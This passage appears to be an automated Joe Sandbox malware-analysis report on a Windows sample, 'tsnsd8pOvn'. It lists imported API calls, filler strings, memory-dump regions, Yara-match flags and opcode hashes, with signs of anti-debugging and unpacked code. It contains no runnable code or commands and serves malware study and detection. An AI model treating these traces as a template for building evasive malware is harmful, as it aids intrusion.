                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invoke_watson_if_error$DebugOutputString$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$IncrementInterlocked__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnwprintf_s_l_memset_xtow_s@20
                                • String ID: %s(%d) : %s$(*_errno())$, Line $HAB$HBB$P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                • API String ID: 2252013794-1089446412
                                • Opcode ID: 8f58be4be26c3639fd9d3f6da141dfa303661eb3dcb26c345e808a55163c32fc
                                • Instruction ID: 607da5235bfcd360cce623cb7dbdc8917479df96a358eaf620506c5408b3e49d
                                • Opcode Fuzzy Hash: 8f58be4be26c3639fd9d3f6da141dfa303661eb3dcb26c345e808a55163c32fc
                                • Instruction Fuzzy Hash: 0312C0B0E40314EBDB20DF50EC4ABDA7374AB44705F50819AF609A62D1D7BCAAC4CF99
                                APIs
                                • BuildCommDCBAndTimeoutsA.KERNEL32(Jed,?,00000000), ref: 0041ED8D
                                • SetComputerNameW.KERNEL32(00000000), ref: 0041ED95
                                • LoadLibraryW.KERNEL32(00000000), ref: 0041ED9D
                                • FreeLibraryAndExitThread.KERNEL32(00000000,00000000), ref: 0041EDA7
                                • GetVersionExA.KERNEL32(?), ref: 0041EDB4
                                • VerifyVersionInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041EDC2
                                • OpenFile.KERNEL32(00000000,?,00000000), ref: 0041EDD3
                                • SetHandleInformation.KERNEL32(00000000,00000000,00000000), ref: 0041EDDF
                                • DeactivateActCtx.KERNEL32(00000000,00000000), ref: 0041EDE9
                                • GetTapeParameters.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041EDFE
                                • GetTempFileNameA.KERNEL32(Fup,Duyobegug kafukeyof ginukin tubosone xajinodafit,00000000,?), ref: 0041EE17
                                • GetConsoleDisplayMode.KERNEL32(00000000), ref: 0041EE1F
                                • GetConsoleDisplayMode.KERNEL32(00000000), ref: 0041EE27
                                • GetDriveTypeW.KERNEL32(Feliyo xumomoxabeya), ref: 0041EE32
                                • RequestWakeupLatency.KERNEL32(00000000), ref: 0041EE3A
                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 0041EE44
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ConsoleDisplayFileLibraryModeNameVersion$BuildCommComputerDeactivateDriveExitFreeHandleInfoInformationLatencyLoadOpenParametersRequestTapeTempThreadTimeoutsTypeValueVerifyWakeup
                                • String ID: Duyobegug kafukeyof ginukin tubosone xajinodafit$Feliyo xumomoxabeya$Fup$Jed
                                • API String ID: 3212926557-3060799460
                                • Opcode ID: 0622672d403cf281dc45777a6ddc0fdffe76b8676a7c6dfbe000c913d1dcf5f7
                                • Instruction ID: 42929eba8ee26c887cd7a03b32f860a537546115a91c46be80b0cee66e05f340
                                • Opcode Fuzzy Hash: 0622672d403cf281dc45777a6ddc0fdffe76b8676a7c6dfbe000c913d1dcf5f7
                                • Instruction Fuzzy Hash: E3311E71B85304EFF7A09FA0ED0AF997BB0AB08B02F5040A5F309AA1D2DAB01545CF59
                                APIs
                                • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EEE4
                                • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041EF20
                                • DeleteVolumeMountPointA.KERNEL32(Gatuwoxa yudesozuja nuxo bavisiyoxopav), ref: 0041EFAC
                                • GetSystemPowerStatus.KERNEL32(00000000), ref: 0041EFC9
                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EFDE
                                • OpenThread.KERNEL32(00000000,00000000,00000000), ref: 0041F005
                                • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041F00F
                                • RequestWakeupLatency.KERNEL32(00000000), ref: 0041F017
                                • CreateJobObjectA.KERNEL32(00000000,00000000), ref: 0041F04D
                                Strings
                                • Gatuwoxa yudesozuja nuxo bavisiyoxopav, xrefs: 0041EFA7
                                • Neyobatud ziyigo fuhuruh mag puyojidiz, xrefs: 0041F0C5
                                • Ribomavepahi bulihunosawimu pofuno nupoji, xrefs: 0041F0C0
                                • , xrefs: 0041EEFC
                                • Nawihuxoxu, xrefs: 0041F0CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: CreateVolume$BoostDeleteInformationLatencyMountMultipleNamedObjectObjectsOpenPipePointPowerPriorityProcessRequestStatusSystemThreadWaitWakeup
                                • String ID: $Gatuwoxa yudesozuja nuxo bavisiyoxopav$Nawihuxoxu$Neyobatud ziyigo fuhuruh mag puyojidiz$Ribomavepahi bulihunosawimu pofuno nupoji
                                • API String ID: 3118345774-247417240
                                • Opcode ID: 408affb7e5265512a0ecf07fee047435b55b5ce2af9136c74d55d44da700ae1d
                                • Instruction ID: 1704b2e87fcd135584f6b4e7ed04564e9953a6cf692821136d82c7357fdf8e43
                                • Opcode Fuzzy Hash: 408affb7e5265512a0ecf07fee047435b55b5ce2af9136c74d55d44da700ae1d
                                • Instruction Fuzzy Hash: 51713874E04209DFDB60CFA8E845BAEBBB0FB48715F10812AE915B7391C3746945CF99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$_free_malloc_strstr$_wcsstr
                                • String ID: "
                                • API String ID: 430003804-123907689
                                • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                • Instruction ID: eb070e3902d3a8affaf5e1edfc613bf96d92d3dfcb13f7bc620876f42c3fa925
                                • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                • Instruction Fuzzy Hash: F84214B1418391ABD720DFA4CC48F9B7BE8BF45308F44092DF98997195DB76D608CBA2
                                APIs
                                • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0041F11E
                                • DebugActiveProcessStop.KERNEL32(00000000), ref: 0041F126
                                • EnterCriticalSection.KERNEL32(00000000), ref: 0041F12E
                                • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041F176
                                • IsBadReadPtr.KERNEL32(00000000,00000000), ref: 0041F192
                                • GetConsoleMode.KERNEL32(00000000,00000000), ref: 0041F1AD
                                • FlushConsoleInputBuffer.KERNEL32(00000000), ref: 0041F1B5
                                • LoadResource.KERNEL32(00000000,00000000), ref: 0041F1BF
                                • GetConsoleOutputCP.KERNEL32 ref: 0041F1F0
                                • AddConsoleAliasW.KERNEL32(00000000,00000000,00000000), ref: 0041F1FC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Console$ActiveAliasBufferCopyCriticalDebugEnterEnumFileFlushFormatsInputLoadModeOutputProcessReadResourceSectionStopTime
                                • String ID:
                                • API String ID: 1368446300-0
                                • Opcode ID: 540f0b82778843b62b3be6d3548d5c35a36a604577bf0d1d00222f20f7887451
                                • Instruction ID: 57af4abef105eddbb397afd99020a63fbc50d4452f8b0965d041af8086ec4dbd
                                • Opcode Fuzzy Hash: 540f0b82778843b62b3be6d3548d5c35a36a604577bf0d1d00222f20f7887451
                                • Instruction Fuzzy Hash: BE312A30B44208EBEB60DFA4EC49B9DB7B1BB58701F108169EA15A6290C7745986CB5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: <$x2Q
                                • API String ID: 2102423945-643667464
                                • Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                • Instruction ID: c83136bd6ebad08ecf581bf5a4b0c93146a331f0dae53a1fdd753c495521b90b
                                • Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                • Instruction Fuzzy Hash: C5D2E371524351ABD724EFA0DC94BAFB7E6BF84308F40092DE48587298DB76A50DCF92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                • Instruction ID: a07cec96aaa8bd68dc3328666f77f8cdff1f8c21b8733b5518190291e5b2a4a8
                                • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                • Instruction Fuzzy Hash: 8C52A171D20229EBDF10DFE8C884BEEB7B5BF14308F508169D419A7254E776AA48CF91
                                APIs
                                • _wcsstr.LIBCMT ref: 0221E72D
                                • _wcsstr.LIBCMT ref: 0221E756
                                • _memset.LIBCMT ref: 0221E784
                                  • Part of subcall function 0225FC0C: std::exception::exception.LIBCMT ref: 0225FC1F
                                  • Part of subcall function 0225FC0C: __CxxThrowException@8.LIBCMT ref: 0225FC34
                                  • Part of subcall function 0225FC0C: std::exception::exception.LIBCMT ref: 0225FC4D
                                  • Part of subcall function 0225FC0C: __CxxThrowException@8.LIBCMT ref: 0225FC62
                                  • Part of subcall function 0225FC0C: std::regex_error::regex_error.LIBCPMT ref: 0225FC74
                                  • Part of subcall function 0225FC0C: __CxxThrowException@8.LIBCMT ref: 0225FC82
                                  • Part of subcall function 0225FC0C: std::exception::exception.LIBCMT ref: 0225FC9B
                                  • Part of subcall function 0225FC0C: __CxxThrowException@8.LIBCMT ref: 0225FCB0
                                • _wcsstr.LIBCMT ref: 0221EA0C
                                • _memset.LIBCMT ref: 0221EE5C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                • String ID:
                                • API String ID: 1338678108-0
                                • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                • Instruction ID: f8724f67475b2bbc30b1e089736d2ef1c53ffcfae249e096718bb8aefcaef556
                                • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                • Instruction Fuzzy Hash: AC52EDB1A103199FCF24CFA8CC80BAEBBF5BF14304F154569E806AB289D7719A45CF91
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 004191AD
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004191C4
                                • UnhandledExceptionFilter.KERNEL32(004261B0), ref: 004191CF
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 004191ED
                                • TerminateProcess.KERNEL32(00000000), ref: 004191F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                • String ID:
                                • API String ID: 2579439406-0
                                • Opcode ID: 3de15c23e80d2af340f2690530d556acc0573896fa4d5d9eed28186c07cf00f0
                                • Instruction ID: e1cde53ab6f7dd812c8a3c1a5448c4efbae9bd4b37550eaa4797c13b4980f94e
                                • Opcode Fuzzy Hash: 3de15c23e80d2af340f2690530d556acc0573896fa4d5d9eed28186c07cf00f0
                                • Instruction Fuzzy Hash: A421F0B4901308ABC720DF29FC856953BA4BB18305F50423AEC0C92772E775599ACF4D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                • Instruction ID: 246ddf7ad96914ccce3c053046d713278e53dfbc59af789c319c5e6aedca12e7
                                • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                • Instruction Fuzzy Hash: 90429E71D20228EBDF14DFE4C844BDEB7B5BF14308F204169D409A7295EB72AA59CFA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                • Instruction ID: 442ca1eb647f27798db1ade5707dbe6ad6d554fe63e9538edfca44ceb4daae74
                                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                • Instruction Fuzzy Hash: A7527070E10249DFDB10DFA4C844FAEBBF5BF59304F148198E905AB294DB74AE46CBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                • Instruction ID: 5f3debaf955edd79e9130d3897c7d051f51b5e91f73c4c39b537367b3f7b638c
                                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                • Instruction Fuzzy Hash: 013253B1E1022D9BDF619FA4CC44BAEB7B9FF45704F0041EAEA0CA6154DB748A84CF59
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_0000C090), ref: 0040C10A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 0cc9ef21937408120f2dacae10aad833f77879a01fde0243f18665b7737a3532
                                • Instruction ID: 5ba00875492902686897453746a4916a0c7d599069e825d5fd26b7135f919676
                                • Opcode Fuzzy Hash: 0cc9ef21937408120f2dacae10aad833f77879a01fde0243f18665b7737a3532
                                • Instruction Fuzzy Hash: 92B01231244208A7426013F26C09A177ACCC5C87343910131F10C81441D8629851C459
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                • Instruction ID: ec4f050f9d095e4ee6f98e779e4f1d44d47cf9e6f596fd22b789ed087dcf8fd2
                                • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                • Instruction Fuzzy Hash: C642B071629F158BC3DADF24C88055BF3E1FFC8218F048A1DD99997A94DB38F819CA91
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                • Instruction ID: 928e66383c4e509fdf2641551546dfed6362cfcee554c702a20b24a5193f2fcd
                                • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                • Instruction Fuzzy Hash: A322E076915B028FC714CF19D080A5AF7E1FF98324F158A2EE8A9A7B14C730BA55CF81
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                • Instruction ID: e399abbb9646e35362f4845456fecc93601c610ec7f3cffb1cdb059d5c8d33cc
                                • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                • Instruction Fuzzy Hash: E0028D711187058FC756EE5CD49035AF3E2FFC8309F198A2CD68987B64E739A9198F82
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                • Instruction ID: e805e33d61bc42523c7575600575bb2774adad88d496eaf3aa33689e5f480f98
                                • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                • Instruction Fuzzy Hash: 01C12833E2477906D764DEAE8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                • Instruction ID: ff37f64dbfa43b4e2a3ac9b1e68fe1cf919504c61c4f7d9d515c6b466cd1fccb
                                • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                • Instruction Fuzzy Hash: 6FA1DA0A8090E4ABEF455A7E90B63EBAFE9CB27354E76719284D85B793C019120FDF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                • Instruction ID: eca78bf5a72bf113685a2c39fed69ec8818f146f38c9e87676bc891af1624e5f
                                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                • Instruction Fuzzy Hash: 2BC19DB5E003599FCB54CFA9C881ADEFBF1FF48204F24856AE919E7301E334AA458B55
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                • Instruction ID: 8902138343914f818399e23a3b2d96ec7925116ba2ae0f780c16034b35f2a3cd
                                • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                • Instruction Fuzzy Hash: 7DB183A0039FA686CBD3FF30911024BF7E0BFC525DF44194AD99986864EB3EE94E9215
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                • Instruction ID: b8242c7530523b624b4005a05bbd5d1af3e1eabd0f92633d63a72faaee220664
                                • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                • Instruction Fuzzy Hash: E59114739187BA06D7609EAE8C441B9B6E3AFC4210F9B077ADD9467282C9309E0697D0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                • Instruction ID: 606eb918711236ab4f9600ed04f8ac28b10f5e96f7cad4ea7c9fdb4c223a7c36
                                • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
